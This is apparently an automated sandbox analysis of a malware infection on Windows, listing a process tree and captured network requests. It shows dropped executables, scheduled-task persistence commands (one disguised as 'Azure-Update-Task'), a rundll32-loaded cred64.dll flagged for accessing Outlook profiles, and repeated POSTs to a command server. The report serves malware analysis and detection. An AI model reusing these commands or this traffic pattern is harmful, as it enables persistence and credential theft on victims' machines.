C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8714846f8,0x7ff871484708,0x7ff8714847185⤵PID:5476
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000007001\anon.exe"C:\Users\Admin\AppData\Local\Temp\1000007001\anon.exe"3⤵
- Executes dropped EXE
PID:5424
-
-
C:\Users\Admin\AppData\Local\Temp\1000009001\leman.exe"C:\Users\Admin\AppData\Local\Temp\1000009001\leman.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
PID:5676 -
C:\Users\Admin\AppData\Local\Temp\d003af69b2\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\d003af69b2\nbveek.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
PID:5816 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\d003af69b2\nbveek.exe" /F5⤵
- DcRat
- Creates scheduled task(s)
PID:6040
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- outlook_win_path
PID:4216
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000010051\clim.exe"C:\Users\Admin\AppData\Local\Temp\1000010051\clim.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
PID:5396 -
C:\Users\Admin\AppData\Local\Temp\745548282-j0xYuta9G35m02YL.exe"C:\Users\Admin\AppData\Local\Temp\745548282-j0xYuta9G35m02YL.exe"4⤵
- Executes dropped EXE
PID:4936
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
PID:4260
-
-
-
C:\Users\Admin\AppData\Local\Temp\C059.exeC:\Users\Admin\AppData\Local\Temp\C059.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe"2⤵
- Executes dropped EXE
PID:5036
-
-
C:\Users\Admin\AppData\Local\Temp\C2BB.exeC:\Users\Admin\AppData\Local\Temp\C2BB.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:240
-
C:\Users\Admin\AppData\Local\Temp\C433.exeC:\Users\Admin\AppData\Local\Temp\C433.exe1⤵
- Executes dropped EXE
PID:3816 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 3482⤵
- Program crash
PID:3120
-
-
C:\Users\Admin\AppData\Local\Temp\CC33.exeC:\Users\Admin\AppData\Local\Temp\CC33.exe1⤵
- Executes dropped EXE
PID:4452 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"2⤵PID:2216
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 12722⤵
- Program crash
PID:4740
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 12402⤵
- Program crash
PID:4804
-
-
C:\Users\Admin\AppData\Local\Temp\CFFD.exeC:\Users\Admin\AppData\Local\Temp\CFFD.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3052 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"2⤵PID:4700
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"2⤵PID:2804
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 12802⤵
- Program crash
PID:4540
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 12522⤵
- Program crash
PID:1540
-
-
C:\Users\Admin\AppData\Local\Temp\D5F9.exeC:\Users\Admin\AppData\Local\Temp\D5F9.exe1⤵
- Executes dropped EXE
PID:4812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3816 -ip 38161⤵PID:2920
-
C:\Users\Admin\AppData\Local\Temp\E5E8.exeC:\Users\Admin\AppData\Local\Temp\E5E8.exe1⤵
- Executes dropped EXE
PID:4904
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4452 -ip 44521⤵PID:2936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4452 -ip 44521⤵PID:5116
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3052 -ip 30521⤵PID:1476
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3052 -ip 30521⤵PID:4840
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1524
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:440
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4080 -ip 40801⤵PID:5580
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4636 -ip 46361⤵PID:1332
-
C:\Users\Admin\AppData\Local\Temp\64BE.exeC:\Users\Admin\AppData\Local\Temp\64BE.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Checks processor information in registry
PID:3112 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 11122⤵
- Program crash
PID:3392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 11202⤵
- Program crash
PID:5092
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 11522⤵
- Program crash
PID:1144
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 11602⤵
- Program crash
PID:1904
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 12082⤵
- Program crash
PID:1404
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 12202⤵
- Program crash
PID:3456
-
-
C:\Users\Admin\AppData\Local\Temp\Otfhfhweptay.exe"C:\Users\Admin\AppData\Local\Temp\Otfhfhweptay.exe"2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2028 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 4523⤵
- Program crash
PID:4824
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#612⤵
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- outlook_office_path
PID:3796 -
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵PID:724
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 14602⤵
- Program crash
PID:724
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Executes dropped EXE
PID:4896 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"2⤵
- DcRat
- Creates scheduled task(s)
PID:2884
-
-
C:\Users\Admin\AppData\Local\Temp\d003af69b2\nbveek.exeC:\Users\Admin\AppData\Local\Temp\d003af69b2\nbveek.exe1⤵
- Executes dropped EXE
PID:440
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3112 -ip 31121⤵PID:5772
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3112 -ip 31121⤵PID:5600
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3112 -ip 31121⤵PID:6120
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3112 -ip 31121⤵PID:5644
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3112 -ip 31121⤵PID:1136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3112 -ip 31121⤵PID:4536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3112 -ip 31121⤵PID:3148
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2028 -ip 20281⤵PID:5692
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --no-first-run --no-default-browser-check --silent-launch --disable-backgrounding-occluded-windows --disable-background-timer-throttling --ran-launcher --profile-directory="Default"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4192 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff871944f50,0x7ff871944f60,0x7ff871944f702⤵PID:4204
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1668,2135578047286785356,6797780335899014649,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1684 /prefetch:22⤵PID:6008
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1668,2135578047286785356,6797780335899014649,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1752 /prefetch:82⤵PID:6128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1668,2135578047286785356,6797780335899014649,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2268 /prefetch:82⤵PID:1704
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,2135578047286785356,6797780335899014649,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3544 /prefetch:82⤵PID:3700
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4192 -s 37362⤵
- Program crash
PID:4836
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3144
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 548 -p 4192 -ip 41921⤵PID:3148
-
C:\Users\Admin\AppData\Local\Temp\d003af69b2\nbveek.exeC:\Users\Admin\AppData\Local\Temp\d003af69b2\nbveek.exe1⤵
- Executes dropped EXE
PID:5964
Network
-
Remote address:8.8.8.8:53Requestpotunulit.orgIN AResponsepotunulit.orgIN A188.114.97.0potunulit.orgIN A188.114.96.0
-
Remote address:188.114.97.0:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://iyhqilng.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 319
Host: potunulit.org
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ux0%2FCWhGc6N8HJcJ0ySvsnmfrQGuV8AqoysTI%2FCnE67AhiT0mJoYCf93oqvPUs6C4GvMHYsAD48JkRiKGusa9U%2FfdcYCQ16wOiftG0KsScF48ZtOCNJU%2FO2nhm5kX31%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 781ec325d8f3b7a8-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:188.114.97.0:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qumpsmm.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 235
Host: potunulit.org
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eRCLvyUIobKfpZ1qBnlxs99Tf%2BbBNlRj2F5ipKOf3b900kvtAro%2Bf0apVhZAIE9SCn66iOfCu2mIatd7EKT%2B13ChW1uCQSnfUciWC2%2FxRfHgTtAqkjoG43qAu6xtD%2Bt8"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 781ec326a965b7a8-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:188.114.97.0:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://joeta.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 241
Host: potunulit.org
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BNtVjSECSwuKEUJDjBVQ7AyTWOJ1iekqIJ1EJUZo7k7mCX9DhvOBOSe5g67mKWqN65aUKRdm2t4fpWr7K%2FYi1LrHAimUvS7JIrWshLmgnrVoCN%2B4njH2YSlzBa4IouIr"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 781ec32769f4b7a8-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:188.114.97.0:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dqkuywalga.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 289
Host: potunulit.org
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nsk78GCiggeiO%2FeQqPSdOlG6if3nU4fuDsGf7%2FiFEoWUP2HO%2BO70qXm4%2BEWle%2BxYz5V7N%2BGHPFpEoHcBrAYPk2Vyx2IxmyV%2B3LrG1RSzbKOHGulGf6aSLP%2B3jVdt3AKx"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 781ec329bbd9b7a8-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:188.114.97.0:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cimbes.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 222
Host: potunulit.org
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xst6mECVfjIlO4k28P%2FB4VYoKa5HF7BsG8ZLtsemamttkhU7qlk%2B1T5MGyzr72Y%2BkTREdnfKl8sMx9xoCS9swYT0ZBzIbigShv9t7C%2FTNQ%2FCcug3bOU3%2FD%2BnMitIg4qY"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 781ec32a3c41b7a8-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:188.114.97.0:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yhwrlwtjh.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 236
Host: potunulit.org
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LfbvVs%2FDVa62Oec9%2BTOCzd%2FwKjqOEyDDBZyMpvoil8W8S20YXTdaMLTVQPLuyb%2BOulEsOEkbjN7le5K4Vo2shbJ%2F9yfztgUgFBaBBO0xECquiXUAn4mSnFkuS%2BZRL8vC"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 781ec3323a00b7a8-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:188.114.97.0:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://celoie.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 165
Host: potunulit.org
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1UOj0Q1soRJdePuh6gcowjkBav8IVUUEQgVcBLmjAMsNbTZzOQDBlGyd3AmdnEnYeS%2Frqke3RzUwtwup0Zgmo6jatw9lWO0A06qVZFA%2B3f09fLjWKkB6oPcQV7AggnK6"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 781ec332ba59b7a8-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:188.114.97.0:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nxbqls.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 276
Host: potunulit.org
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PlExrCVMbE80J7yXsYXLQprzMBJJ6EQDyATO%2B5IJdedV5gpjXb3Px1T7W9JaeMa3yETDoXKUD492PSq8MQ14zXlg3xdAyPYjB7f9A0Z6uAtR6s%2BZpTapbVYzcVGvOekh"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 781ec3343b5eb7a8-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:188.114.97.0:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dhrthjvj.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 244
Host: potunulit.org
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BWhswXQKXv7FtX9SpF14in0nxORqZkvk49cDFyHJvuigNaKI6fKWLL0mDjccdWvvfxdxxfwQNPZ6i70WgtT0%2F%2FB1EpPvyyo5f%2FCVBSuW1WQgu%2Ft5hDp4uah%2FZcZNeQuW"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 781ec334bbc4b7a8-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:188.114.97.0:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gqgpqrmojv.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 276
Host: potunulit.org
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=P3mcmhNEGZyEz74dYBmGL1x7xXxq7ucQCNsWW987TkvkBmPgEvcSyk3mKNOGv0d4Ejll6tztkfmd5zH%2BvcV8UvBtw0rQPtVAKFyUYEFgItfv%2FZKeLiSLlfX1MymUFsTo"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 781ec3385e75b7a8-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:188.114.97.0:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vqtlyvothu.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 157
Host: potunulit.org
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rkaXT9mUYudCaqvjojN9jaK4gug6U7jTTz4Dx6EOD5ZS8gSFjed2TlFGfgUmdrzsDbZ%2FTlFJkbaNgVTA%2B6%2FEoWXdYDGw3iE5XI%2BLkx4jfqgcJ4SMpGJcg4mFGY3i%2FHmz"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 781ec3391edab7a8-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:188.114.97.0:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://omtxfctcc.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 132
Host: potunulit.org
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HxlkCY3xEnXLOwvAgwid5g4aaykpd5Ej6oz0H0LZeXa9Cfsdfc%2BltWo777C8OGnBOmScIComoEp4ydJzyPi5%2B3nPX89Zu5Pymu2wrbyQyIvVD4ZmomjEhWWtcwSzB6SP"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 781ec33ac814b7a8-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:188.114.97.0:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://oowhiuvasd.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 312
Host: potunulit.org
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0E3kj%2F05qm9tbXSRD1SoBYaxwRWRb%2FvRU8%2FgtAUEVh4qEAQiRheb7uJCeuTsZJ0SOcUx%2BHvjyi2NJUL2AhZNeHbsU1dU6kfXmZt4Dc0xqPD0vRkwjWM8%2F0og0fWoAMD3"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 781ec33b7889b7a8-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:188.114.97.0:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://blyqsqh.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 155
Host: potunulit.org
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2mw7EiJG5k8ijclif1HUvE1oB9hBM68jQXH4EINUfBt8J7M6rkDjRHgB3IzShVSLKxb35Oi7TiZGOzoKvLlSrS8ZzgQZ1iwwlEsBdx5Gv%2F8tOGgdFEKmy2UfyfL3d0Wf"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 781ec347da13b7a8-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:188.114.97.0:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://eilyumlxc.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 165
Host: potunulit.org
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
